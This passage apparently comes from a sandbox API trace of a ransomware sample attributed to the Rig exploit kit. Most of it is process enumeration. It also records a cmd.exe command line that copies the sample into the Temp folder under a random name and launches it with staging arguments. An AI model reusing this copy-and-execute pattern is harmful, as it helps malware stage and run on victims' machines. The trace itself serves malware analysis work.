Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0093.346] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0093.347] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0093.348] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.348] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.349] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.350] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.350] 
Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.351] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0093.352] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.352] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.353] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0093.354] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.355] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.357] 
Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0093.358] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0093.359] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0093.360] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.362] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.363] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0093.364] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) 
returned 1 [0093.365] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0093.366] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0093.367] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0093.368] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0093.369] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0093.370] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0093.372] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="marble.exe")) returned 1 [0093.373] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0093.374] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0093.375] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0093.443] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0093.444] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0093.445] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0093.446] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0093.447] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0093.448] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0093.449] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0093.450] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0093.451] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.452] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.454] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, 
th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.455] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa78, pcPriClassBase=8, dwFlags=0x0, szExeFile="2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe")) returned 1 [0093.455] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0093.456] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xab4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.457] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaac, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0093.458] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0093.459] CloseHandle (hObject=0xc8) returned 1 [0093.459] GetTickCount () returned 0x22a98 [0093.459] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15024856226) returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0093.459] MultiByteToWideChar 
(in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0093.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0093.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0093.460] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1343bec, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0093.460] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0093.460] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0093.460] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x1343bec, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0093.460] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0093.460] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0093.460] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\NHSGKR2P.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\NHSGKR2P.EXE\" [PARAMS]") returned 0xb1 [0093.460] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0093.460] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb44*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb34 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessInformation=0x12fb34*(hProcess=0xc0, hThread=0xc8, dwProcessId=0xad4, dwThreadId=0xad8)) returned 1 [0093.491] CloseHandle (hObject=0xc0) returned 1 [0093.491] CloseHandle (hObject=0xc8) returned 1 [0093.491] Sleep (dwMilliseconds=0xfa) [0093.757] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0093.762] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0093.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0093.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, 
szExeFile="wininit.exe")) returned 1 [0093.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0093.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0093.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0093.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0093.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0093.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0093.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, 